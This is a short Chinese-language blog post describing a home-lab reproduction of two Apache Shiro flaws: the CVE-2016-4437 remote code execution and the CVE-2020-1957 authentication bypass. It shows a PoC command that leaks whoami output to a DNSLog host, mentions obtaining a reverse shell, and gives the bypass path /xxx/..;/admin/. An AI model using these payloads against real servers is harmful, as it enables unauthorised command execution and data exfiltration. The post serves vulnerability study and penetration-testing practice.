Apache Shiro

 Apache Shiro

前言 : 

進行內網滲透時,Shiro 服務也滿常見到的,是不錯下手的一個點,後來找找 PoC 自己嘗試復現一次漏洞,挺好玩的。

內文 : 

影響範圍(CVE-2016-4437)

Apache Shiro <= 1.2.4

實作環境
Victim : 192.168.235.128 , kali
Attack : 192.168.235.158 , windows 10 

利用 DNSLog 去接收是否資訊。

python shiro_rce.py http://192.168.235.128:8080/login "ping `whoami`.ssngky.dnslog.cn"

成功將 RCE,將 root 用戶帶到 DNSLog.cn 上。

或利用圖形化工具 ShiroExploit.jar 進行利用。




因為不會回顯,所以可以採反彈 shell 的方式去執行(測試用的vpsip,已刪除)。

成功將 shell 彈到 vps 上面。

CVE-2020-1957(認證繞過漏洞)

影響範圍

Apache Shiro < 1.5.1

客戶端請求 /admin 後台路徑。

PoC。

/xxx/..;/admin/


成功登入後台系統。

Reference : 
https://github.com/fupinglee/ShiroScan (GUI圖形化)
https://github.com/sv3nbeast/ShiroScan
https://github.com/vulhub/vulhub/tree/master/shiro/CVE-2020-1957

留言

熱門文章